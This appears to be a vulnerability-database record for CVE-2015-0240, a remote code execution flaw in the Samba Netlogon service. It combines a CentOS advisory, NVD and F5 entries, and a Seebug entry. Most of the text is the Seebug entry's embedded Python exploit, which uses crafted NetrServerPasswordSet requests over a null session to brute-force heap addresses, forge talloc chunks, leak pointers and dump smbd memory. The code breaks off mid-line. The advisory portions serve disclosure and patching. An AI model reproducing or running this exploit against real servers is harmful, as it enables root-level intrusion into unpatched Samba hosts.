ID CESA-2015:0252 Type centos Reporter CentOS Project Modified 2015-02-23T14:35:15
Description
CentOS Errata and Security Advisory CESA-2015:0252
Samba is an open-source implementation of the Server Message Block (SMB) or
Common Internet File System (CIFS) protocol, which allows PC-compatible
machines to share files, printers, and other information.
An uninitialized pointer use flaw was found in the Samba daemon (smbd).
A malicious Samba client could send specially crafted netlogon packets
that, when processed by smbd, could potentially lead to arbitrary code
execution with the privileges of the user running smbd (by default, the
root user). (CVE-2015-0240)
For additional information about this flaw, see the Knowledgebase article
at https://access.redhat.com/articles/1346913
Red Hat would like to thank the Samba project for reporting this issue.
Upstream acknowledges Richard van Eeden of Microsoft Vulnerability Research
as the original reporter of this issue.
All Samba users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue. After installing this
update, the smb service will be restarted automatically.
Merged security bulletin from advisories:
http://lists.centos.org/pipermail/centos-announce/2015-February/020945.html
{"cve": [{"lastseen": "2019-05-29T18:14:39", "bulletinFamily": "NVD", "description": "The Netlogon server implementation in smbd in Samba 3.5.x and 3.6.x before 3.6.25, 4.0.x before 4.0.25, 4.1.x before 4.1.17, and 4.2.x before 4.2.0rc5 performs a free operation on an uninitialized stack pointer, which allows remote attackers to execute arbitrary code via crafted Netlogon packets that use the ServerPasswordSet RPC API, as demonstrated by packets reaching the _netr_ServerPasswordSet function in rpc_server/netlogon/srv_netlog_nt.c.", "modified": "2019-04-22T17:48:00", "id": "CVE-2015-0240", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0240", "published": "2015-02-24T01:59:00", "title": "CVE-2015-0240", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2017-06-08T00:16:30", "bulletinFamily": "software", "description": "\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 11.0.0 - 11.6.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 11.4.0 - 11.6.0| Not vulnerable| None \nBIG-IP AFM| None| 11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP Analytics| None| 11.0.0 - 11.6.0| Not vulnerable| None \nBIG-IP APM| None| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 11.0.0 - 11.6.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 11.0.0 - 11.6.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nLineRate| None| 2.2.0 - 2.5.0 \n1.6.0 - 1.6.4| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.1.0 \n3.3.2 - 3.5.1| Not vulnerable| None \n \n**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n", "modified": "2016-06-28T22:10:00", "published": "2015-04-02T21:02:00", "id": "F5:K16350", "href": "https://support.f5.com/csp/article/K16350", "title": "Samba vulnerability CVE-2015-0240", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:04", "bulletinFamily": "software", "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "modified": "2016-06-28T00:00:00", "published": "2015-04-02T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/300/sol16350.html", "id": "SOL16350", "title": "SOL16350 - Samba vulnerability CVE-2015-0240", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:25:55", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2015-11-13T00:00:00", "published": "2015-11-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89724", "id": "SSV:89724", "type": "seebug", "title": "Samba NetLogon\u672a\u521d\u59cb\u5316\u6307\u9488\u6f0f\u6d1e\uff08CVE-2015-0240\uff09", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\nimport sys\r\nimport time\r\nfrom struct import pack,unpack\r\nimport argparse\r\n \r\nimport impacket\r\nfrom impacket.dcerpc.v5 import transport, nrpc\r\nfrom impacket.dcerpc.v5.ndr import NDRCALL\r\nfrom impacket.dcerpc.v5.dtypes import WSTR\r\n \r\n \r\nclass Requester:\r\n \"\"\"\r\n put all smb request stuff into class. help my editor folding them\r\n \"\"\"\r\n \r\n # impacket does not implement NetrServerPasswordSet\r\n # 3.5.4.4.6 NetrServerPasswordSet (Opnum 6)\r\n class NetrServerPasswordSet(NDRCALL):\r\n opnum = 6\r\n structure = (\r\n ('PrimaryName',nrpc.PLOGONSRV_HANDLE),\r\n ('AccountName',WSTR),\r\n ('SecureChannelType',nrpc.NETLOGON_SECURE_CHANNEL_TYPE),\r\n ('ComputerName',WSTR),\r\n ('Authenticator',nrpc.NETLOGON_AUTHENTICATOR),\r\n ('UasNewPassword',nrpc.ENCRYPTED_NT_OWF_PASSWORD),\r\n )\r\n # response is authenticator (8 bytes) and error code (4 bytes)\r\n \r\n # size of each field in sent packet\r\n req_server_handle_size = 16\r\n req_username_hdr_size = 4 + 4 + 4 + 2 # max count, offset, actual count, trailing null\r\n req_sec_type_size = 2\r\n req_computer_size = 4 + 4 + 4 + 2\r\n req_authenticator_size = 8 + 2 + 4\r\n req_new_pwd_size = 16\r\n req_presize = req_server_handle_size + req_username_hdr_size + req_sec_type_size + req_computer_size + req_authenticator_size + req_new_pwd_size\r\n \r\n samba_rpc_fragment_size = 4280\r\n netlogon_data_fragment_size = samba_rpc_fragment_size - 8 - 24 # 24 is dcerpc header size\r\n \r\n def __init__(self):\r\n self.target = None\r\n self.dce = None\r\n \r\n sessionKey = '\\x00'*16\r\n # prepare ServerPasswordSet request\r\n authenticator = nrpc.NETLOGON_AUTHENTICATOR()\r\n authenticator['Credential'] = nrpc.ComputeNetlogonCredential('12345678', sessionKey)\r\n authenticator['Timestamp'] = 10\r\n \r\n uasNewPass = nrpc.ENCRYPTED_NT_OWF_PASSWORD()\r\n uasNewPass['Data'] = '\\x00'*16\r\n \r\n self.serverName = nrpc.PLOGONSRV_HANDLE()\r\n # ReferentID field of PrimaryName controls the uninitialized value of creds\r\n self.serverName.fields['ReferentID'] = 0\r\n \r\n self.accountName = WSTR()\r\n \r\n request = Requester.NetrServerPasswordSet()\r\n request['PrimaryName'] = self.serverName\r\n request['AccountName'] = self.accountName\r\n request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel\r\n request['ComputerName'] = '\\x00'\r\n request['Authenticator'] = authenticator\r\n request['UasNewPassword'] = uasNewPass\r\n self.request = request\r\n \r\n def set_target(self, target):\r\n self.target = target\r\n \r\n def set_payload(self, s, pad_to_size=0):\r\n if pad_to_size > 0:\r\n s += '\\x00'*(pad_to_size-len(s))\r\n pad_size = 0\r\n if len(s) < (16*1024+1):\r\n ofsize = (len(s)+self.req_presize) % self.netlogon_data_fragment_size\r\n if ofsize > 0:\r\n pad_size = self.netlogon_data_fragment_size - ofsize\r\n \r\n self.accountName.fields['Data'] = s+'\\x00'*pad_size+'\\x00\\x00'\r\n self.accountName.fields['MaximumCount'] = None\r\n self.accountName.fields['ActualCount'] = None\r\n self.accountName.data = None # force recompute\r\n \r\n set_accountNameData = set_payload\r\n \r\n def get_dce(self):\r\n if self.dce is None or self.dce.lostconn:\r\n rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:%s[\\PIPE\\netlogon]' % self.target)\r\n rpctransport.set_credentials('','') # NULL session\r\n rpctransport.set_dport(445)\r\n # force to 'NT LM 0.12' only\r\n rpctransport.preferred_dialect('NT LM 0.12')\r\n \r\n self.dce = rpctransport.get_dce_rpc()\r\n self.dce.connect()\r\n self.dce.bind(nrpc.MSRPC_UUID_NRPC)\r\n self.dce.lostconn = False\r\n return self.dce\r\n \r\n def get_socket(self):\r\n return self.dce.get_rpc_transport().get_socket()\r\n \r\n def force_dce_disconnect(self):\r\n if not (self.dce is None or self.dce.lostconn):\r\n self.get_socket().close()\r\n self.dce.lostconn = True\r\n \r\n def request_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n answer = dce.recv()\r\n return unpack(\"<IIII\", answer)\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return None\r\n \r\n # call with no read\r\n def call_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n return True\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return False\r\n \r\n def force_recv(self):\r\n dce = self.get_dce()\r\n return dce.get_rpc_transport().recv(forceRecv=True)\r\n \r\n def request_check_valid_addr(self, addr):\r\n answers = self.request_addr(addr)\r\n if answers is None:\r\n return False # connection lost\r\n elif answers[3] != 0:\r\n return True # error, expected\r\n else:\r\n raise Error('Unexpected result')\r\n \r\n \r\n# talloc constants\r\nTALLOC_MAGIC = 0xe8150c70 # for talloc 2.0\r\nTALLOC_FLAG_FREE = 0x01\r\nTALLOC_FLAG_LOOP = 0x02\r\nTALLOC_FLAG_POOL = 0x04\r\nTALLOC_FLAG_POOLMEM = 0x08\r\n \r\nTALLOC_HDR_SIZE = 0x30 # for 32 bit\r\n \r\nflag_loop = TALLOC_MAGIC | TALLOC_FLAG_LOOP # for checking valid address\r\n \r\n# Note: do NOT reduce target_payload_size less than 8KB. 4KB is too small buffer. cannot predict address.\r\nTARGET_PAYLOAD_SIZE = 8192\r\n \r\n########\r\n# request helper functions\r\n########\r\n \r\n# only one global requester\r\nrequester = Requester()\r\n \r\ndef force_dce_disconnect():\r\n requester.force_dce_disconnect()\r\n \r\ndef request_addr(addr):\r\n return requester.request_addr(addr)\r\n \r\ndef request_check_valid_addr(addr):\r\n return requester.request_check_valid_addr(addr)\r\n \r\ndef set_payload(s, pad_to_size=0):\r\n requester.set_payload(s, pad_to_size)\r\n \r\ndef get_socket():\r\n return requester.get_socket()\r\n \r\ndef call_addr(addr):\r\n return requester.call_addr(addr)\r\n \r\ndef force_recv():\r\n return requester.force_recv()\r\n \r\n########\r\n# find heap address\r\n########\r\n \r\n# only refs MUST be NULL, other never be checked\r\nfake_chunk_find_heap = pack(\"<IIIIIIII\",\r\n 0, 0, 0, 0, # refs\r\n flag_loop, flag_loop, flag_loop, flag_loop,\r\n)\r\n \r\ndef find_valid_heap_addr(start_addr, stop_addr, payload_size, first=False):\r\n \"\"\"\r\n below code can be used for checking valid heap address (no crash)\r\n \r\n if (unlikely(tc->flags & TALLOC_FLAG_LOOP)) {\r\n /* we have a free loop - stop looping */\r\n return 0;\r\n }\r\n \"\"\"\r\n global fake_chunk_find_heap\r\n payload = fake_chunk_find_heap*(payload_size/len(fake_chunk_find_heap))\r\n set_payload(payload)\r\n addr_step = payload_size\r\n addr = start_addr\r\n i = 0\r\n while addr > stop_addr:\r\n if i == 16:\r\n print(\" [*]trying addr: {:x}\".format(addr))\r\n i = 0\r\n \r\n if request_check_valid_addr(addr):\r\n return addr\r\n if first:\r\n # first time, the last 16 bit is still do not know\r\n # have to do extra check\r\n if request_check_valid_addr(addr+0x10):\r\n return addr+0x10\r\n addr -= addr_step\r\n i += 1\r\n return None\r\n \r\ndef find_valid_heap_exact_addr(addr, payload_size):\r\n global fake_chunk_find_heap\r\n fake_size = payload_size // 2\r\n while fake_size >= len(fake_chunk_find_heap):\r\n payload = fake_chunk_find_heap*(fake_size/len(fake_chunk_find_heap))\r\n set_payload(payload, payload_size)\r\n if not request_check_valid_addr(addr):\r\n addr -= fake_size\r\n fake_size = fake_size // 2\r\n \r\n set_payload('\\x00'*16 + pack(\"<I\", flag_loop), payload_size)\r\n # because glibc heap is align by 8\r\n # so the last 4 bit of address must be 0x4 or 0xc\r\n if request_check_valid_addr(addr-4):\r\n addr -= 4\r\n elif request_check_valid_addr(addr-0xc):\r\n addr -= 0xc\r\n else:\r\n print(\" [-] bad exact addr: {:x}\".format(addr))\r\n return 0\r\n \r\n print(\" [*] checking exact addr: {:x}\".format(addr))\r\n \r\n if (addr & 4) == 0:\r\n return 0\r\n \r\n # test the address\r\n \r\n # must be invalid (refs is AccountName.ActualCount)\r\n set_payload('\\x00'*12 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-4):\r\n print(' [-] request_check_valid_addr(addr-4) failed')\r\n return 0\r\n # must be valid (refs is AccountName.Offset)\r\n # do check again if fail. sometimes heap layout is changed\r\n set_payload('\\x00'*8 + pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-8) and not request_check_valid_addr(addr-8) :\r\n print(' [-] request_check_valid_addr(addr-8) failed')\r\n return 0\r\n # must be invalid (refs is AccountName.MaxCount)\r\n set_payload('\\x00'*4 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-0xc):\r\n print(' [-] request_check_valid_addr(addr-0xc) failed')\r\n return 0\r\n # must be valid (refs is ServerHandle.ActualCount)\r\n # do check again if fail. sometimes heap layout is changed\r\n set_payload(pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-0x10) and not request_check_valid_addr(addr-0x10):\r\n print(' [-] request_check_valid_addr(addr-0x10) failed')\r\n return 0\r\n \r\n return addr\r\n \r\ndef find_payload_addr(start_addr, start_payload_size, target_payload_size):\r\n print('[*] bruteforcing heap address...')\r\n \r\n start_addr = start_addr & 0xffff0000\r\n \r\n heap_addr = 0\r\n while heap_addr == 0:\r\n # loop from max to 0xb7700000 for finding heap area\r\n # offset 0x20000 is minimum offset from heap start to recieved data in heap\r\n stop_addr = 0xb7700000 + 0x20000\r\n good_addr = None\r\n payload_size = start_payload_size\r\n while payload_size >= target_payload_size:\r\n force_dce_disconnect()\r\n found_addr = None\r\n for i in range(3):\r\n found_addr = find_valid_heap_addr(start_addr, stop_addr, payload_size, good_addr is None)\r\n if found_addr is not None:\r\n break\r\n if found_addr is None:\r\n # failed\r\n good_addr = None\r\n break\r\n good_addr = found_addr\r\n print(\" [*] found valid addr ({:d}KB): {:x}\".format(payload_size//1024, good_addr))\r\n start_addr = good_addr\r\n stop_addr = good_addr - payload_size + 0x20\r\n payload_size //= 2\r\n \r\n if good_addr is not None:\r\n # try 3 times to find exact address. if address cannot be found, assume\r\n # minimizing payload size is not correct. start minimizing again\r\n for i in range(3):\r\n heap_addr = find_valid_heap_exact_addr(good_addr, target_payload_size)\r\n if heap_addr != 0:\r\n break\r\n force_dce_disconnect()\r\n \r\n if heap_addr == 0:\r\n print(' [-] failed to find payload adress')\r\n # start from last good address + some offset\r\n start_addr = (good_addr + 0x10000) & 0xffff0000\r\n print('[*] bruteforcing heap adress again from {:x}'.format(start_addr))\r\n \r\n payload_addr = heap_addr - len(fake_chunk_find_heap)\r\n print(\" [+] found payload addr: {:x}\".format(payload_addr))\r\n return payload_addr\r\n \r\n \r\n########\r\n# leak info\r\n########\r\n \r\ndef addr2utf_prefix(addr):\r\n def is_badchar(v):\r\n return (v >= 0xd8) and (v <= 0xdf)\r\n \r\n prefix = 0 # safe\r\n if is_badchar((addr)&0xff) or is_badchar((addr>>16)&0xff):\r\n prefix |= 2 # cannot have prefix\r\n if is_badchar((addr>>8)&0xff) or is_badchar((addr>>24)&0xff):\r\n prefix |= 1 # must have prefix\r\n return prefix\r\n \r\ndef leak_info_unlink(payload_addr, next_addr, prev_addr, retry=True, call_only=False):\r\n \"\"\"\r\n Note:\r\n - if next_addr and prev_addr are not zero, they must be writable address\r\n because of below code in _talloc_free_internal()\r\n if (tc->prev) tc->prev->next = tc->next;\r\n if (tc->next) tc->next->prev = tc->prev;\r\n \"\"\"\r\n # Note: U+D800 to U+DFFF is reserved (also bad char for samba)\r\n # check if '\\x00' is needed to avoid utf16 badchar\r\n prefix_len = addr2utf_prefix(next_addr) | addr2utf_prefix(prev_addr)\r\n if prefix_len == 3:\r\n return None # cannot avoid badchar\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n \r\n fake_chunk_leak_info = pack(\"<IIIIIIIIIIII\",\r\n next_addr, prev_addr, # next, prev\r\n 0, 0, # parent, children\r\n 0, 0, # refs, destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n payload = '\\x00'*prefix_len+fake_chunk_leak_info + pack(\"<I\", 0x80000) # pool_object_count\r\n set_payload(payload, TARGET_PAYLOAD_SIZE)\r\n if call_only:\r\n return call_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n \r\n for i in range(3 if retry else 1):\r\n try:\r\n answers = request_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n except impacket.dcerpc.v5.rpcrt.Exception:\r\n print(\"impacket.dcerpc.v5.rpcrt.Exception\")\r\n answers = None\r\n force_dce_disconnect()\r\n if answers is not None:\r\n # leak info must have next or prev address\r\n if (answers[1] == prev_addr) or (answers[0] == next_addr):\r\n break\r\n #print('{:x}, {:x}, {:x}, {:x}'.format(answers[0], answers[1], answers[2], answers[3]))\r\n answers = None # no next or prev in answers => wrong answer\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n \r\n return answers\r\n \r\ndef leak_info_addr(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: because leak_addr[4:8] will be replaced with r_out_addr\r\n # only answers[0] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, leak_addr, r_out_addr, retry)\r\n \r\ndef leak_info_addr2(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: leak_addr[0:4] will be replaced with r_out_addr\r\n # only answers[1] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, r_out_addr-4, leak_addr-4, retry)\r\n \r\ndef leak_uint8t_addr(payload_addr, r_out_addr, chunk_addr):\r\n # leak name field ('uint8_t') in found heap chunk\r\n # do not retry this leak, because r_out_addr is guessed\r\n answers = leak_info_addr(payload_addr, r_out_addr, chunk_addr + 0x18, False)\r\n if answers is None:\r\n return None\r\n if answers[2] != TALLOC_MAGIC:\r\n force_dce_disconnect()\r\n return None\r\n \r\n return answers[0]\r\n \r\ndef leak_info_find_offset(info):\r\n # offset from pool to payload still does not know\r\n print(\"[*] guessing 'r' offset and leaking 'uint8_t' address ...\")\r\n chunk_addr = info['chunk_addr']\r\n uint8t_addr = None\r\n r_addr = None\r\n r_out_addr = None\r\n while uint8t_addr is None:\r\n # 0x8c10 <= 4 + 0x7f88 + 0x2044 - 0x13c0\r\n # 0x9ce0 <= 4 + 0x7f88 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xadc8 <= 4 + 0x7f88 + 0x10e8 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xad40 is extra offset when no share on debian\r\n # 0x10d38 is extra offset when only [printers] is shared on debian\r\n for offset in (0x8c10, 0x9ce0, 0xadc8, 0xad40, 0x10d38):\r\n r_addr = chunk_addr - offset\r\n # 0x18 is out.authenticator offset\r\n r_out_addr = r_addr + 0x18\r\n print(\" [*] try 'r' offset 0x{:x}, r_out addr: 0x{:x}\".format(offset, r_out_addr))\r\n \r\n uint8t_addr = leak_uint8t_addr(info['payload_addr'], r_out_addr, chunk_addr)\r\n if uint8t_addr is not None:\r\n print(\" [*] success\")\r\n break\r\n print(\" [-] failed\")\r\n if uint8t_addr is None:\r\n return False\r\n \r\n info['uint8t_addr'] = uint8t_addr\r\n info['r_addr'] = r_addr\r\n info['r_out_addr'] = r_out_addr\r\n info['pool_addr'] = r_addr - 0x13c0\r\n \r\n print(\" [+] text 'uint8_t' addr: {:x}\".format(info['uint8t_addr']))\r\n print(\" [+] pool addr: {:x}\".format(info['pool_addr']))\r\n \r\n return True\r\n \r\ndef leak_sock_fd(info):\r\n # leak sock fd from\r\n # smb_request->sconn->sock\r\n # (offset: ->0x3c ->0x0 )\r\n print(\"[*] leaking socket fd ...\")\r\n info['smb_request_addr'] = info['pool_addr']+0x11a0\r\n print(\" [*] smb request addr: {:x}\".format(info['smb_request_addr']))\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr']+0x3c-4)\r\n if answers is None:\r\n print(' [-] cannot leak sconn_addr address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n sconn_addr = answers[2]\r\n info['sconn_addr'] = sconn_addr\r\n print(' [+] sconn addr: {:x}'.format(sconn_addr))\r\n \r\n # write in padding of chunk, no need to disconnect\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], sconn_addr)\r\n if answers is None:\r\n print('cannot leak sock_fd address :(')\r\n return None\r\n sock_fd = answers[1]\r\n print(' [+] sock fd: {:d}'.format(sock_fd))\r\n info['sock_fd'] = sock_fd\r\n return sock_fd\r\n \r\ndef leak_talloc_pop_addr(info):\r\n # leak destructor talloc_pop() address\r\n # overwrite name field, no need to disconnect\r\n print('[*] leaking talloc_pop address')\r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], info['pool_addr'] + 0x14)\r\n if answers is None:\r\n print(' [-] cannot leak talloc_pop() address :(')\r\n return None\r\n if answers[2] != 0x2010: # chunk size must be 0x2010\r\n print(' [-] cannot leak talloc_pop() address. answers[2] is wrong :(')\r\n return None\r\n talloc_pop_addr = answers[0]\r\n print(' [+] talloc_pop addr: {:x}'.format(talloc_pop_addr))\r\n info['talloc_pop_addr'] = talloc_pop_addr\r\n return talloc_pop_addr\r\n \r\ndef leak_smbd_server_connection_handler_addr(info):\r\n # leak address from\r\n # smbd_server_connection.smb1->fde ->handler\r\n # (offset: ->0x9c->0x14 )\r\n # MUST NOT disconnect after getting smb1_fd_event address\r\n print('[*] leaking smbd_server_connection_handler address')\r\n def real_leak_conn_handler_addr(info):\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['sconn_addr'] + 0x9c)\r\n if answers is None:\r\n print(' [-] cannot leak smb1_fd_event address :(')\r\n return None\r\n smb1_fd_event_addr = answers[1]\r\n print(' [*] smb1_fd_event addr: {:x}'.format(smb1_fd_event_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], smb1_fd_event_addr+0x14)\r\n if answers is None:\r\n print(' [-] cannot leak smbd_server_connection_handler address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n smbd_server_connection_handler_addr = answers[0]\r\n diff = info['talloc_pop_addr'] - smbd_server_connection_handler_addr\r\n if diff > 0x2000000 or diff < 0:\r\n print(' [-] get wrong smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n smbd_server_connection_handler_addr = None\r\n return smbd_server_connection_handler_addr\r\n \r\n smbd_server_connection_handler_addr = None\r\n while smbd_server_connection_handler_addr is None:\r\n smbd_server_connection_handler_addr = real_leak_conn_handler_addr(info)\r\n \r\n print(' [+] smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n info['smbd_server_connection_handler_addr'] = smbd_server_connection_handler_addr\r\n \r\n return smbd_server_connection_handler_addr\r\n \r\ndef find_smbd_base_addr(info):\r\n # estimate smbd_addr from talloc_pop\r\n if (info['talloc_pop_addr'] & 0xf) != 0 or (info['smbd_server_connection_handler_addr'] & 0xf) != 0:\r\n # code has no alignment\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x124000\r\n else:\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x130000\r\n start_addr = start_addr & 0xfffff000\r\n stop_addr = start_addr - 0x20000\r\n \r\n print('[*] finding smbd loaded addr ...')\r\n while True:\r\n smbd_addr = start_addr\r\n while smbd_addr >= stop_addr:\r\n if addr2utf_prefix(smbd_addr-8) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n test_addr = smbd_addr - 0x800 - 4\r\n else:\r\n test_addr = smbd_addr - 8\r\n # test writable on test_addr\r\n answers = leak_info_addr(info['payload_addr'], 0, test_addr, retry=False)\r\n if answers is not None:\r\n break\r\n smbd_addr -= 0x1000 # try prev page\r\n if smbd_addr > stop_addr:\r\n break\r\n print(' [-] failed. try again.')\r\n \r\n info['smbd_addr'] = smbd_addr\r\n print(' [+] found smbd loaded addr: {:x}'.format(smbd_addr))\r\n \r\ndef dump_mem_call_addr(info, target_addr):\r\n # leak pipes_struct address from\r\n # smbd_server_connection->chain_fsp->fake_file_handle->private_data\r\n # (offset: ->0x48 ->0xd4 ->0x4 )\r\n # Note:\r\n # - MUST NOT disconnect because chain_fsp,fake_file_handle,pipes_struct address will be changed\r\n # - target_addr will be replaced with current_pdu_sent address\r\n # check read_from_internal_pipe() in source3/rpc_server/srv_pipe_hnd.c\r\n print(' [*] overwrite current_pdu_sent for dumping memory ...')\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr'] + 0x48)\r\n if answers is None:\r\n print(' [-] cannot leak chain_fsp address :(')\r\n return False\r\n chain_fsp_addr = answers[1]\r\n print(' [*] chain_fsp addr: {:x}'.format(chain_fsp_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], chain_fsp_addr+0xd4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak fake_file_handle address :(')\r\n return False\r\n fake_file_handle_addr = answers[0]\r\n print(' [*] fake_file_handle addr: {:x}'.format(fake_file_handle_addr))\r\n \r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], fake_file_handle_addr+0x4-0x4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak pipes_struct address :(')\r\n return False\r\n pipes_struct_addr = answers[2]\r\n print(' [*] pipes_struct addr: {:x}'.format(pipes_struct_addr))\r\n \r\n current_pdu_sent_addr = pipes_struct_addr+0x84\r\n print(' [*] current_pdu_sent addr: {:x}'.format(current_pdu_sent_addr))\r\n # change pipes->out_data.current_pdu_sent to dump memory\r\n return leak_info_unlink(info['payload_addr'], current_pdu_sent_addr-4, target_addr, call_only=True)\r\n \r\ndef dump_smbd_find_bininfo(info):\r\n def recv_till_string(data, s):\r\n pos = len(data)\r\n while True:\r\n data += force_recv()\r\n if len(data) == pos:\r\n print('no more data !!!')\r\n return None\r\n p = data.find(s, pos-len(s))\r\n if p != -1:\r\n return (data, p)\r\n pos = len(data)\r\n return None\r\n \r\n def lookup_dynsym(dynsym, name_offset):\r\n addr = 0\r\n i = 0\r\n offset_str = pack(\"<I\", name_offset)\r\n while i < len(dynsym):\r\n if dynsym[i:i+4] == offset_str:\r\n addr = unpack(\"<I\", dynsym[i+4:i+8])[0]\r\n break\r\n i += 16\r\n return addr\r\n \r\n print('[*] dumping smbd ...')\r\n dump_call = False\r\n # have to minus from smbd_addr because code section is read-only\r\n if addr2utf_prefix(info['smbd_addr']-4) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n dump_addr = info['smbd_addr'] - 0x800 - 4\r\n else:\r\n dump_addr = info['smbd_addr'] - 4\r\n for i in range(8):\r\n if dump_mem_call_addr(info, dump_addr):\r\n mem = force_recv()\r\n if len(mem) == 